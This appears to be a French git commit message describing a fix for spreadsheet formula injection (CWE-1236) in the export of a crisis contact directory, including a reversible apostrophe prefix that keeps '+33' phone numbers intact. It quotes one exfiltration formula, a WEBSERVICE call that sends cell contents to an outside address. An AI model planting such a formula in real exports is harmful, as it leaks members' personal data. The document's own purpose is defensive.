Loading
Sécurité : l'export tabulaire ne fait plus exécuter de formule au tableur
Les champs libres de l'annuaire sont saisis par les membres de l'organisation ;
l'export est ouvert par le directeur de crise. Une cellule commençant par « = »
est une formule pour Excel comme pour LibreOffice, et
« =WEBSERVICE("http://…"&A1) » expédie l'annuaire entier au premier
double-clic. C'est CWE-1236, et le tableur fait exactement ce qu'on lui demande.
La neutralisation est réversible, et elle devait l'être : l'export doit se
relire à l'identique (EF-215), et un numéro d'astreinte écrit « +33 6 … »
commence par une amorce de formule. Un préfixe posé une fois pour toutes
l'aurait transformé en « 33 » — sur un annuaire de crise, c'est pire que la
faille qu'il corrige.
L'apostrophe n'est donc retirée à l'import que si ce qui suit est bien une
amorce : un nom qui commence réellement par une apostrophe garde la sienne.
Co-Authored-By: Claude (RCA)
Signed-off-by:
Jordan Grossemy <jordan.grossemy@rca.fr>